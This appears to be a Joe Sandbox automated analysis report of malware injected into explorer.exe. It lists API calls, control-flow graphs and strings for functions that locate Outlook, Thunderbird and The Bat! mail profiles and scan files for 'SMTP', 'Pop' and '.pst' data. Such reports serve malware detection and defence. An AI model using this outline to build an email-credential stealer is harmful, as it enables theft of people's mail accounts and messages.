Function_000838A7 84 Function_000899B8 86 Function_000886BE 87 Function_000887B5 89 Function_000895B7 91->42 92->110 93 Function_000888CE 94 Function_00088FC0 95 Function_000896C2 96 Function_00088DDB 97 Function_000854DC 98 Function_000848D6 99 Function_00084CD6 100 Function_00088ED6 101 Function_000897E8 103 Function_000887EB 104 Function_000836E0 105 Function_000887E1 107 Function_000890E5 108 Function_000894E6 109 Function_00088DF9 112 Function_000896FC 113 Function_00088AFD 114 Function_00088CFE 115 Function_00084AF0 116 Function_000835F2 117 Function_000818F4 117->25 117->64 117->70 117->88 118 Function_000848F4 119 Function_00088CF5 120 Function_00089CF6

                                                      Executed Functions

                                                      Function 0008255C Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88stringfileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                      • lstrcatW.KERNEL32(00000000), ref: 00082588
                                                      • PathAppendW.SHLWAPI(00000000,*.*), ref: 00082594
                                                      • FindFirstFileW.KERNELBASE(00000000,?,?,000818F4), ref: 000825A8
                                                      • RtlZeroMemory.NTDLL(00000209,00000209), ref: 000825C3
                                                      • lstrcatW.KERNEL32(00000209,?), ref: 000825E1
                                                      • PathAppendW.SHLWAPI(00000209,?), ref: 000825ED
                                                      • lstrcatW.KERNEL32(00000209,?), ref: 00082611
                                                      • PathAppendW.SHLWAPI(00000209,?), ref: 0008261D
                                                      • StrStrIW.SHLWAPI(00000209,?), ref: 0008262C
                                                      • FindNextFileW.KERNELBASE(00000000,?,?,000818F4), ref: 00082644
                                                      • FindClose.KERNEL32(00000000,?,000818F4), ref: 00082653
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
                                                      • String ID: *.*
                                                      • API String ID: 1648349226-438819550
                                                      • Opcode ID: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
                                                      • Instruction ID: 9ab04f0758e8323f23007aef3f0b497425df495bdb796eec7b4485748527ddf8
                                                      • Opcode Fuzzy Hash: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
                                                      • Instruction Fuzzy Hash: C9217171204315AFE710BF209D589AFBBECFFC5B05F04051DFAD1A2251EB389A168B66
                                                      Function 00081016 Relevance: 3.0, APIs: 2, Instructions: 19nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 267 81016-81020 call 827e2 270 81022-81023 267->270 271 81024-81049 call 829b7 RtlMoveMemory NtUnmapViewOfSection call 8104f 267->271 275 8104e 271->275
                                                      APIs
                                                        • Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF
                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0008103A
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081043
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                      • String ID:
                                                      • API String ID: 1675517319-0
                                                      • Opcode ID: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
                                                      • Instruction ID: 55d5dd33b2f901c1089b15beaab3eab97d09ece425fd31eaa01e34cb85dd0178
                                                      • Opcode Fuzzy Hash: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
                                                      • Instruction Fuzzy Hash: 23D05E31800260B7EA657774BC1E9CA2A8CBF45730B254251B6E5961D3C9794A818B71
                                                      Function 0008104F Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 115COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008107F
                                                      • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081093
                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810A7
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000), ref: 000810BB
                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810D3
                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810E7
                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810FB
                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008110F
                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081123
                                                      • wsprintfA.USER32 ref: 0008116B
                                                      • ExitProcess.KERNEL32 ref: 00081189
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                                                      • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                                                      • API String ID: 1709485025-1688604020
                                                      • Opcode ID: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
                                                      • Instruction ID: 4a2ba61a2a61d2de802517fd4c21c0c34be2e32a5e302aa0719222a3359143be
                                                      • Opcode Fuzzy Hash: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
                                                      • Instruction Fuzzy Hash: 7331937174022566EA5133654C1AFFF198DBF81FD4B050124F6C9DA2C3DE598E0387B6
                                                      Function 0008126E Relevance: 12.4, APIs: 8, Instructions: 365filesleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 65 8126e-81298 CreateFileW 66 816fb-81708 Sleep 65->66 67 8129e-812b0 GetFileSize 65->67 68 816f3-816fa CloseHandle 67->68 69 812b6-812bc 67->69 68->66 69->68 70 812c2-812d5 call 829b7 69->70 73 812db-812fc ReadFile 70->73 74 816f2 70->74 75 812fe-81301 73->75 76 8130f 73->76 74->68 77 816eb-816ed call 82999 75->77 78 81307-8130d 75->78 79 81315-8131b 76->79 77->74 78->79 80 81329-8134b SetFilePointer 79->80 81 8131d-8131f 79->81 80->77 84 81351-8135d 80->84 81->80 83 81321-81323 81->83 83->77 83->80 85 8136b-81372 84->85 86 8135f-81369 84->86 87 81374-8137f RtlMoveMemory 85->87 88 81381 85->88 86->87 89 81383-81394 87->89 88->89 90 8139d-813a1 89->90 91 81396-8139b 89->91 92 813a3-813db ReadFile 90->92 91->92 93 816db-816e5 92->93 94 813e1-813e9 92->94 93->77 93->84 95 813ef-813f7 94->95 96 81561-81569 94->96 97 816bc-816c9 95->97 98 813fd-81405 95->98 96->97 99 8156f-81577 96->99 97->94 101 816cf-816d7 97->101 98->97 100 8140b-81417 98->100 99->97 102 8157d-81589 99->102 103 81419-8141e 100->103 104 81420-81422 100->104 101->93 105 8158b-81590 102->105 106 81592-81594 102->106 103->104 104->97 107 81428-81441 call 818ea 104->107 105->106 106->97 108 8159a-815b3 call 818ea 106->108 113 816b8 107->113 115 81447-81458 call 8170b 107->115 108->113 114 815b9-815ca call 8170b 108->114 113->97 114->113 120 815d0-815d5 114->120 115->113 121 8145e-81468 115->121 120->113 122 815db-815ed 120->122 121->113 123 8146e-81480 121->123 124 815ff-81601 122->124 125 815ef-815fb call 8185c 122->125 126 81492-81494 123->126 127 81482-8148e call 8185c 123->127 131 81613-81619 124->131 132 81603-8160e call 81810 124->132 125->124 128 814a6-814ac 126->128 129 81496-814a1 call 81810 126->129 127->126 136 8154b-8155c call 81c39 128->136 137 814b2-814b9 128->137 129->128 140 8161f-81626 131->140 141 816a0-816ac call 81c39 131->141 132->131 155 816b1-816b3 call 81972 136->155 143 814bf-814c4 137->143 144 81542-81545 137->144 145 81628-8162d 140->145 146 8169b-8169e 140->146 141->155 149 814ca-814d3 143->149 150 814c6-814c8 143->150 144->113 144->136 151 8162f-81631 145->151 152 81633-8163c 145->152 146->113 146->141 149->113 156 814d9-814de 149->156 150->144 150->149 151->146 151->152 152->113 154 8163e-81643 152->154 154->113 157 81645-81652 154->157 155->113 156->113 159 814e4-814f1 156->159 160 81653-8166c 157->160 161 814f2-8150b 159->161 162 8166e-81671 160->162 163 8168f-81694 160->163 164 8150d-81510 161->164 165 8152e-81533 161->165 162->163 167 81673-8168b call 81c39 call 81972 162->167 163->160 168 81696 163->168 164->165 169 81512-8152a call 81c39 call 81972 164->169 165->161 166 81535-8153d 165->166 166->113 167->163 168->146 169->165
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00081289
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 000812A1
                                                      • CloseHandle.KERNELBASE(00000000), ref: 000816F4
                                                        • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                      • ReadFile.KERNELBASE(00000000,00000000,00000400,?,00000000), ref: 000812E8
                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0008132D
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00081379
                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000813B6
                                                        • Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                        • Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                      • Sleep.KERNELBASE(00000064), ref: 000816FD
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$MemoryMove$HeapRead$AllocateCloseCreateHandlePointerProcessSizeSleep
                                                      • String ID:
                                                      • API String ID: 1032042679-0
                                                      • Opcode ID: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
                                                      • Instruction ID: 75e5417636b9bb59cc4e60b4fe32e97da451ac298a5a535e8d66e3deab824b36
                                                      • Opcode Fuzzy Hash: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
                                                      • Instruction Fuzzy Hash: 9DD1D2746082119BC764BF2888406FABBEABFC8760F48462DF8D597295E7308D53CB95
                                                      Function 0008274A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36processstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 178 8274a-82763 CreateToolhelp32Snapshot 179 827b9-827bd 178->179 180 82765-8277d Process32First 178->180 181 827ae-827b0 180->181 182 8277f-82793 lstrcmpi 181->182 183 827b2-827b3 CloseHandle 181->183 184 827a0-827a8 Process32Next 182->184 185 82795-8279b call 827be 182->185 183->179 184->181 185->184
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00082758
                                                      • Process32First.KERNEL32(00000000,?), ref: 00082777
                                                      • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008278B
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 000827A8
                                                      • CloseHandle.KERNELBASE(00000000), ref: 000827B3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                      • String ID: outlook.exe
                                                      • API String ID: 868014591-749849299
                                                      • Opcode ID: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
                                                      • Instruction ID: 343884579346d2584715dea729d65f949d7c5dc94cdf17a98ebe8d79567dd670
                                                      • Opcode Fuzzy Hash: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
                                                      • Instruction Fuzzy Hash: 23F06230505128ABE720BB65DC49BEE77BCBB48B25F400190E9C9A2191EB388B544F95
                                                      Function 00089CF6 Relevance: 3.3, APIs: 2, Instructions: 282COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 195 89cf6-89d10 196 89d15 195->196 197 89d16-89d28 196->197 199 89d2a 197->199 200 89d8e-89d8f 197->200 202 89d2c-89d36 199->202 203 89caf-89cbd 199->203 201 89d90-89d95 200->201 204 89d96-89d98 201->204 202->196 207 89d38-89d43 202->207 205 89cbf-89cce 203->205 206 89cd1-89cf4 203->206 208 89d9a-89d9f 204->208 209 89da1 204->209 205->206 206->195 210 89d44-89d4c 207->210 208->209 209->201 211 89da3 209->211 210->210 212 89d4e-89d50 210->212 213 89da8-89daa 211->213 214 89d79-89d88 212->214 215 89d52-89d55 212->215 216 89dac-89db1 213->216 217 89db3-89db7 213->217 214->200 214->208 215->197 218 89d57-89d75 215->218 216->217 217->213 221 89db9 217->221 219 89d7b-89d88 218->219 220 89f3d 218->220 219->208 220->220 222 89dbb-89dc2 221->222 223 89dc4-89dc9 221->223 222->213 222->223 224 89dd8-89dda 223->224 225 89dcb-89dd4 223->225 226 89ddc-89de1 224->226 227 89de3-89de7 224->227 228 89e4a-89e4d 225->228 229 89dd6 225->229 226->227 230 89de9-89dee 227->230 231 89df0-89df2 227->231 232 89e52-89e55 228->232 229->224 230->231 234 89e14-89e23 231->234 235 89df4 231->235 233 89e57-89e59 232->233 233->232 236 89e5b-89e5e 233->236 238 89e34-89e41 234->238 239 89e25-89e2c 234->239 237 89df5-89df7 235->237 236->232 240 89e60-89e7c 236->240 241 89df9-89dfe 237->241 242 89e00-89e04 237->242 238->238 243 89e43-89e45 238->243 239->239 244 89e2e 239->244 240->233 245 89e7e 240->245 241->242 242->237 246 89e06 242->246 243->204 244->204 247 89e84-89e88 245->247 248 89e08-89e0f 246->248 249 89e11 246->249 250 89e8a-89ea0 247->250 251 89ecf-89ed2 247->251 248->237 248->249 249->234 259 89ea1-89ea6 250->259 252 89ed5-89edc 251->252 253 89ede-89ee0 252->253 254 89f00-89f30 VirtualProtect * 2 252->254 256 89ee2-89ef1 253->256 257 89ef3-89efe 253->257 258 89f34-89f38 254->258 256->252 257->256 258->258 260 89f3a 258->260 259->247 261 89ea8-89eaa 259->261 260->220 262 89eac-89eb2 261->262 263 89eb3-89ec0 261->263 262->263 265 89ec9-89ecc 263->265 266 89ec2-89ec7 263->266 266->259
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000088000.00000040.80000000.00040000.00000000.sdmp, Offset: 00088000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_88000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
                                                      • Instruction ID: a463335449e91c4295caeb03356daa0005c9d69c2ec95bec009e1af8dcd402f7
                                                      • Opcode Fuzzy Hash: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
                                                      • Instruction Fuzzy Hash: 439137725193914FD726BE78CCC46B5BFE0FB52320B2C06A9D9D1CB386E7A4580AC764
                                                      Function 000829B7 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 276 829b7-829c7 GetProcessHeap RtlAllocateHeap
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateProcess
                                                      • String ID:
                                                      • API String ID: 1357844191-0
                                                      • Opcode ID: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
                                                      • Instruction ID: 3c8c13ecdc887a9dfa87a418431857bd093085331a36a112817de6aaaa3d87e4
                                                      • Opcode Fuzzy Hash: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
                                                      • Instruction Fuzzy Hash: 1CA002B15503005BFD4457F5AE1EA157528B7D4B01F0045447385890549A6955148F21
                                                      Function 00082999 Relevance: 2.5, APIs: 2, Instructions: 12memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 284 82999-829a3 call 827e2 287 829b5-829b6 284->287 288 829a5-829af GetProcessHeap HeapFree 284->288 288->287
                                                      APIs
                                                        • Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00000209,00082664,?,000818F4), ref: 000829A8
                                                      • HeapFree.KERNEL32(00000000,?,000818F4), ref: 000829AF
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcessQueryVirtual
                                                      • String ID:
                                                      • API String ID: 2580854192-0
                                                      • Opcode ID: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
                                                      • Instruction ID: 09411c8b402897cefff5f73e0440f262c5ce0b05ffcf0dbc953be38e067b1978
                                                      • Opcode Fuzzy Hash: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
                                                      • Instruction Fuzzy Hash: ACC02B3100433053DA6037743C1DBC63B0CBF8AB21F050082F9C1970418B6A8C018BB0

                                                      Non-executed Functions

                                                      Function 00081C39 Relevance: 40.4, APIs: 8, Strings: 15, Instructions: 177COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 289 81c39-81c5f call 829b7 RtlMoveMemory 292 81c65-81c6d 289->292 293 81e36-81e3c 289->293 294 81e2d-81e30 292->294 295 81c73-81c75 292->295 294->292 294->293 295->294 296 81c7b-81c80 295->296 296->294 297 81c86-81c8b 296->297 297->294 298 81c91-81c96 297->298 298->294 299 81c9c-81ca0 298->299 300 81cd2-81cd4 299->300 301 81ca2-81cae call 81ffb 299->301 300->294 302 81cda-81cf0 300->302 307 81cc9-81ccc 301->307 308 81cb0-81cb3 301->308 302->294 304 81cf6-81cfa 302->304 304->294 306 81d00-81d0b 304->306 310 81d0d 306->310 311 81d45-81d47 306->311 307->301 309 81cce 307->309 312 81cba-81cbd 308->312 313 81cb5-81cb8 308->313 309->300 315 81d11-81d1d call 81ffb 310->315 311->294 314 81d4d-81d56 311->314 312->307 316 81cbf-81cc2 312->316 313->307 313->312 317 81d58-81d5e 314->317 318 81d74 314->318 326 81d38-81d3b 315->326 327 81d1f-81d22 315->327 316->307 320 81cc4-81cc7 316->320 321 81d6e-81d72 317->321 322 81d60-81d67 call 81ffb 317->322 318->294 324 81d7a-81d81 318->324 320->307 320->309 321->318 322->321 334 81d69-81d6c 322->334 324->294 328 81d87-81d8a 324->328 326->315 329 81d3d-81d41 326->329 331 81d29-81d2c 327->331 332 81d24-81d27 327->332 328->294 333 81d90-81d99 328->333 329->311 331->326 335 81d2e-81d31 331->335 332->326 332->331 336 81e29 333->336 337 81d9f-81da2 333->337 334->317 334->321 335->326 338 81d33-81d36 335->338 336->294 337->336 339 81da8-81de9 call 829b7 RtlMoveMemory RtlZeroMemory StrStrIA 337->339 338->326 338->329 342 81deb-81df5 StrStrIA 339->342 343 81e22-81e24 call 82999 339->343 342->343 344 81df7-81e01 StrStrIA 342->344 343->336 344->343 346 81e03-81e0d StrStrIA 344->346 346->343 347 81e0f-81e19 StrStrIA 346->347 347->343 348 81e1b-81e1d call 81e44 347->348 348->343
                                                      APIs
                                                        • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                      • RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00081DBA
                                                      • RtlZeroMemory.NTDLL(?,?), ref: 00081DD3
                                                      • StrStrIA.SHLWAPI(00000000,from), ref: 00081DE5
                                                      • StrStrIA.SHLWAPI(00000000,Blob), ref: 00081DF1
                                                      • StrStrIA.SHLWAPI(00000000,Pop), ref: 00081DFD
                                                      • StrStrIA.SHLWAPI(00000000,SMTP), ref: 00081E09
                                                      • StrStrIA.SHLWAPI(00000000,.pst), ref: 00081E15
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memory$HeapMove$AllocateProcessZero
                                                      • String ID: -$-$.$.$.pst$/$/$:$:$Blob$Pop$SMTP$_$_$from
                                                      • API String ID: 1061763166-3069160855
                                                      • Opcode ID: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
                                                      • Instruction ID: 4b5aa8aed124a3871e58e12401931c93ac944f0da3ca0bc3fe3e93e69f00f3b1
                                                      • Opcode Fuzzy Hash: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
                                                      • Instruction Fuzzy Hash: BC5156B0B407165BEB64BA1888A46FE77DEBF85700F084919FDC44B283DB798C474792
                                                      Function 00081972 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 243stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 350 81972-819a6 call 829b7 RtlMoveMemory 353 81c2c-81c31 350->353 354 819ac-819b6 350->354 355 819b7-819bb 354->355 356 819c1-819c3 355->356 357 81c17-81c25 355->357 356->357 358 819c9-819ce 356->358 357->355 359 81c2b 357->359 358->357 360 819d4-819db 358->360 359->353 360->357 361 819e1-819e4 360->361 361->357 362 819ea-819fc 361->362 363 819fe-81a05 362->363 364 81a4f-81a51 362->364 367 81a06-81a11 call 81ffb 363->367 365 81c10-81c12 364->365 366 81a57-81a68 364->366 369 81c13 365->369 366->365 368 81a6e-81a72 366->368 375 81a13-81a1e 367->375 376 81a37-81a3a 367->376 368->365 371 81a78-81a7c 368->371 369->357 373 81a7e-81a84 371->373 374 81ad1-81ad3 371->374 379 81a85-81a90 call 81ffb 373->379 374->365 378 81ad9-81adf 374->378 380 81a20-81a23 375->380 381 81a25-81a28 375->381 376->367 377 81a3c-81a4e 376->377 377->364 382 81b00-81b03 378->382 392 81abc-81abf 379->392 393 81a92-81a9d 379->393 380->376 380->381 381->376 384 81a2a-81a30 381->384 386 81ae1-81ae9 382->386 387 81b05-81b07 382->387 384->376 385 81a32-81a35 384->385 385->376 385->377 386->387 389 81aeb-81afa call 81ffb 386->389 390 81c0c 387->390 391 81b0d-81b14 387->391 389->382 389->390 390->365 391->390 396 81b1a-81b1d 391->396 392->379 394 81ac1-81acd 392->394 397 81a9f-81aa5 393->397 398 81aa7-81aad 393->398 394->374 396->390 400 81b23-81b2a 396->400 397->392 397->398 398->392 401 81aaf-81ab5 398->401 400->390 402 81b30-81b33 400->402 401->392 403 81ab7-81aba 401->403 402->390 404 81b39-81b73 call 829b7 RtlMoveMemory RtlZeroMemory 402->404 403->392 403->394 407 81b79-81b83 404->407 408 81c02-81c0a 404->408 407->408 409 81b85-81b8b 407->409 408->369 409->408 410 81b8d-81b9d StrStrIW 409->410 411 81bfb-81bfd call 82999 410->411 412 81b9f-81ba9 StrStrIW 410->412 411->408 412->411 414 81bab-81bb5 StrStrIW 412->414 414->411 415 81bb7-81bc1 StrStrIW 414->415 415->411 416 81bc3-81bcd StrStrIW 415->416 416->411 417 81bcf-81bd8 lstrlenW 416->417 417->411 418 81bda-81bf6 call 829b7 call 82917 call 81e44 call 82999 417->418 418->411
                                                      APIs
                                                        • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                      • RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,00000001), ref: 00081B53
                                                      • RtlZeroMemory.NTDLL(00000000,00000001), ref: 00081B61
                                                      • StrStrIW.SHLWAPI(00000000,from), ref: 00081B99
                                                      • StrStrIW.SHLWAPI(00000000,Blob), ref: 00081BA5
                                                      • StrStrIW.SHLWAPI(00000000,Pop), ref: 00081BB1
                                                      • StrStrIW.SHLWAPI(00000000,SMTP), ref: 00081BBD
                                                      • StrStrIW.SHLWAPI(00000000,.pst), ref: 00081BC9
                                                      • lstrlenW.KERNEL32(00000000), ref: 00081BD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memory$HeapMove$AllocateProcessZerolstrlen
                                                      • String ID: .pst$;$<$Blob$Pop$SMTP$from
                                                      • API String ID: 76385412-3831209991
                                                      • Opcode ID: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
                                                      • Instruction ID: 4513c980414ea6726187ff74bc215935d9f5c7d3fe74b3bdc2598ba981a98ec9
                                                      • Opcode Fuzzy Hash: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
                                                      • Instruction Fuzzy Hash: 7B71D2357443129BDB28BF18DD40AEE77E9BF88750F148829E9C19B282DB70DD878791
                                                      Function 000820A7 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
